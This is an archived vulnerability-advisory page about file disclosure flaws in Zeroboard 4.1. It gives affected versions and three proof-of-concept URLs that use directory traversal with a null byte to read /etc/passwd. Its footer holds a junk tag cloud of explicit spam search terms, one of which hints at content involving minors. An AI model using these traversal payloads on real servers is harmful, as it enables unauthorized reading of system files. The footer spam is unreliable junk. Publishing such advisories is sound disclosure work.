about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Zeroboard Multiple File Disclosure Vulnerabilities


Title Zeroboard Multiple File Disclosure Vulnerabilities
Published 2005-01-13-12:00AM
Updated 2005-01-13-09:01PM
Class Input Validation Error
CVE   CAN-2005-0379
Remote  Yes
Local  No
Credit  Discovery of this vulnerability is credited to Jeremy Bae at STG Security.
Vulnerable  Zeroboard Zeroboard 4.1 pl5
Zeroboard Zeroboard 4.1 pl4
Zeroboard Zeroboard 4.1 pl3
Zeroboard Zeroboard 4.1 pl2
Debian Linux 2.2 68k
Debian Linux 2.2 alpha
Debian Linux 2.2 arm
Debian Linux 2.2 IA32
Debian Linux 2.2 powerpc
Debian Linux 2.2 sparc
MandrakeSoft Linux Mandrake 8.0
MandrakeSoft Linux Mandrake 8.0 ppc
MandrakeSoft Linux Mandrake 8.1
MandrakeSoft Linux Mandrake 8.1 ia64
MandrakeSoft Linux Mandrake 8.2
RedHat Linux 6.2 alpha
RedHat Linux 6.2 i386
RedHat Linux 6.2 sparc
RedHat Linux 7.0 alpha
RedHat Linux 7.0 i386
RedHat Linux 7.0 sparc
RedHat Linux 7.1 alpha
RedHat Linux 7.1 i386
RedHat Linux 7.1 ia64
RedHat Linux 7.2 i386
RedHat Linux 7.2 ia64
RedHat Linux 7.3 i386
S.u.S.E. Linux 6.4 alpha
S.u.S.E. Linux 6.4 i386
S.u.S.E. Linux 6.4 ppc
S.u.S.E. Linux 7.0 alpha
S.u.S.E. Linux 7.0 i386
S.u.S.E. Linux 7.0 ppc
S.u.S.E. Linux 7.0 sparc
S.u.S.E. Linux 7.1 alpha
S.u.S.E. Linux 7.1 ppc
S.u.S.E. Linux 7.1 sparc
S.u.S.E. Linux 7.1 x86
S.u.S.E. Linux 7.2 i386
S.u.S.E. Linux 7.3 i386
S.u.S.E. Linux 7.3 ppc
S.u.S.E. Linux 7.3 sparc
S.u.S.E. Linux 8.0 i386
Not Vulnerable  
Code   No exploit is required and the following proof of concepts are available:

http://www.example.com/_head.php?_zb_path=../../../../../etc/passwd%00
http://www.example.com/include/write.php?dir=../../../../../etc/passwd%00
http://www.example.com/outlogin.php?_zb_path=../../../../../etc/passwd%00
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Thu, 17 Dec 2009 07:18:21 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
Sexy viedy www.cctvcc Hitomi Hay exploit cg tits fuck Vidio sex news searc 2909.qrqr. www.cctv99 news for C Pantera ro phimsex.co xxairan Video.x grsecurity char XXX sex ar xp admin Aurora Vid /component Sekuriti s soldier Www. Banga news for c Cent OS www.jobyin www.shakee Www.saxygi Www 98 com Ranik sex 89 vid Crack Data underagese jot spot Pemandanga www.blueap Trend Www.indian /component www.pakist 200 /compo news for c www.pakist sako OMG Sexvediodo www.xxmovi www.shangh sriteja Www.sex na